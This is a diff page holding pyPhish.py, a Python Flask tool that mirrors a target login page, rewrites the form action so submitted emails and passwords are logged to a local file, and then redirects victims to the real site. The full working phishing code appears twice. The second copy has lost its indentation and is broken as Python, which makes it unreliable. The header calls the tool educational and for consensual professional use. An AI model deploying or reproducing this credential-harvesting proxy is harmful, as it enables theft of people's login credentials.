osogama · October 18, 2016 20:58
diff --git a/pyPhish.py b/pyPhish.py
 #!/usr/bin/env python
 '''
    Written by @dustyfresh (c) 06-11-16
    
    ABOUT:
    PyPhish is a method of phishing using Python's flask and
    requests modules instead of PHP and HTML. PyPhish will 
    grab page and display it as it would be to the user. 
    PyPhish acts as a proxy but changes the action="some file or url" 
    to redirect all POST & GET data to be logged to PyPhish. 
    Then PyPhish redirects the user where they're supposed to go.
    
    PyPhish is awesome because you don't have to maintain HTML & PHP 
    template code for your phishing campaigns.
    
    This program is free software; you may redistribute 
    and/or modify it under the terms of the GNU General 
    Public License as published by the Free Software Foundation; 
    Version 2 (or later) with the clarifications and exceptions 
    described in the license file. This guarantees your right to 
    use, modify, and redistribute this software under certain 
    conditions. If you wish to embed this technology into 
    proprietary software, we sell alternative licenses 
    (contact @dustyfresh).
    
    NOTICE: The author of this software is not responsible for 
    illegal abuse of this code. The user of this code agrees to 
    have legal consent prior to performing any sort of phishing 
    on live targets. This is for educational and in some case with 
    permission professional use only.
 '''
 import re
 from flask import Flask, request
 import requests

 url = ''

 def mirror():
    headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Referer': '{}'.format(url)}
    req = requests.get(url, headers=headers)
    # Below we are using a regex sub to rewrite the HTML to change action="" with in the login form
    data = re.sub(r'(?<=action\=\")(.*?)\"', '/"', req.text)
    return data

 def phish(email,password):
    with open("/tmp/phish.log", "a") as log:
        log.write('{}:{}\n'.format(email,password))

 pyphish = Flask(__name__)
 @pyphish.route('/', methods=['POST', 'GET'])
 def home():
    try:
        # If the incoming request is a POST request then incercept form credentials
        if request.method == 'POST':
            # Below is where we set the POST variables from the form to intercept 
            # credentials and send them to our phish() logger function
            # send to our logging function
            phish(request.form['email'], request.form['pass'])
            # Now we will redirect them to the service they were supposed 
            # to be using
            return '<script>window.location="{}";</script>'.format(url)
        elif request.method == 'GET':
            # If the incoming request is a GET request then just display the mirror
            return mirror(), 200
    except Exception as e:
        print("There was an issue :( Here is the error:\n{}".format(e))

 if __name__ == '__main__':
    pyphish.run(host='0.0.0.0', port=80, debug=True, threaded=True)
	#!/usr/bin/env python
	'''
	Written by @dustyfresh (c) 06-11-16

	ABOUT:
	PyPhish is a method of phishing using Python's flask and
	requests modules instead of PHP and HTML. PyPhish will
	grab page and display it as it would be to the user.
	PyPhish acts as a proxy but changes the action="some file or url"
	to redirect all POST & GET data to be logged to PyPhish.
	Then PyPhish redirects the user where they're supposed to go.

	PyPhish is awesome because you don't have to maintain HTML & PHP
	template code for your phishing campaigns.

	This program is free software; you may redistribute
	and/or modify it under the terms of the GNU General
	Public License as published by the Free Software Foundation;
	Version 2 (or later) with the clarifications and exceptions
	described in the license file. This guarantees your right to
	use, modify, and redistribute this software under certain
	conditions. If you wish to embed this technology into
	proprietary software, we sell alternative licenses
	(contact @dustyfresh).

	NOTICE: The author of this software is not responsible for
	illegal abuse of this code. The user of this code agrees to
	have legal consent prior to performing any sort of phishing
	on live targets. This is for educational and in some case with
	permission professional use only.
	'''
	import re
	from flask import Flask, request
	import requests

	url = ''

	def mirror():
	headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Referer': '{}'.format(url)}
	req = requests.get(url, headers=headers)
	# Below we are using a regex sub to rewrite the HTML to change action="" with in the login form
	data = re.sub(r'(?<=action\=\")(.*?)\"', '/"', req.text)
	return data

	def phish(email,password):
	with open("/tmp/phish.log", "a") as log:
	log.write('{}:{}\n'.format(email,password))

	pyphish = Flask(__name__)
	@pyphish.route('/', methods=['POST', 'GET'])
	def home():
	try:
	# If the incoming request is a POST request then incercept form credentials
	if request.method == 'POST':
	# Below is where we set the POST variables from the form to intercept
	# credentials and send them to our phish() logger function
	# send to our logging function
	phish(request.form['email'], request.form['pass'])
	# Now we will redirect them to the service they were supposed
	# to be using
	return '<script>window.location="{}";</script>'.format(url)
	elif request.method == 'GET':
	# If the incoming request is a GET request then just display the mirror
	return mirror(), 200
	except Exception as e:
	print("There was an issue :( Here is the error:\n{}".format(e))

	if __name__ == '__main__':
	pyphish.run(host='0.0.0.0', port=80, debug=True, threaded=True)